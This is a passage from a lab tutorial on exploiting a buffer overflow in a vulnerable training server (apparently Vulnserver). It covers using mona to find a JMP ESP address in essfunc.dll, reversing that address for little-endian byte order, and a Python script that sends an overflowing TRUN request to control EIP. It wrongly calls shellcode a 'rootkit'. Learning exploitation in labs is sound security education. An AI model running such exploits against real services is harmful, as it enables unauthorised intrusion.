7. Generate a rootkit from metasploit msfvenom, append it to the payload without exploding the buffer
When we generate a rootkit, we need to look for a injectable memory address.
In this case, we can use mona .
https://github.com/corelan/mona
It is a python module that analyse the memory address protection.
Download it, copy mona.py to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\mona.py .
Restart your server & Immunity Debugger.
In the command input bar, we can hit
!mona help
to learn how to use mona.
Lets use modules function to look for dangerous memory ddl endpoint.
We want zero memory protections here.
No ASLR, no rebase etc.
!mona modules
The essfunc.dll is our target.
Lets look for the memory address in essfunc.dll by find command.
We need ffe4 for JMP ESP memory instruction.
You can use nasm_shell to learn why we search ffe4
root@kali:/usr/share/metasploit-framework/tools# locate nasm_shell
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
root@kali:/usr/share/metasploit-framework/tools# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
Back to our modules, lets try this.
!mona find -s "\xff\xe4 -m essfunc.dll
So we have a few address can be used for exploit.
Lets choose the first one 625011af.
Here is one of the mose important thing you need to know about the memory address injection.
If your target is little Endian like x86 architecture, you need to reverse the memory address like this: "\af\x11\x50\x62"
Otherwise it should be "\x62\x50\x11\xaf"
Check the architecture for more.
https://en.wikipedia.org/wiki/Endianness
So lets back to the immunity debugger.
We need to make sure the 625011af is triggered by our payload.
We can insert a breakpoint in this address to test if our exploit is working.
Click the blue arrow button
Enter address
Look for the address, right click, add break point
Lets run it.
exploit.py
import socket, sys
def prope(message):
"""
prope server
:param message: request message
:return: void
"""
host = "192.168.56.102"
port = 9999
res = None
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_socket.connect((host, port))
my_socket.settimeout(10) # add this to prevent freeze the connection
my_socket.recv(2048).decode()
my_socket.send(message)
res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
my_socket.close()
# hide the success , look for failure, we need crash. we need failure.
print("[success] %s:%s %s => %s" % (host, port, message, res))
except:
print("[error] %s:%s %s => None" % (host, port, len(message))) # modify the output for testing ttl length
raise
# sys.exit()
def main():
# memory address 625011af
# shell = '\x62\x50\x11\xaf'
shell = b"\xaf\x11\x50\x62"
# shell = b"BBBB"
payload = b"TRUN ." + b"A" * 2006 + shell
# print(payload)
prope(payload)
print("completed test")
if __name__ == "__main__":
main()
Noted that in python3 , we have to use bytestring to concat string.
Or it will add a extra \xc2 when the char cannot be parsed as UTF8
Lets get to the rootkit in next chapter.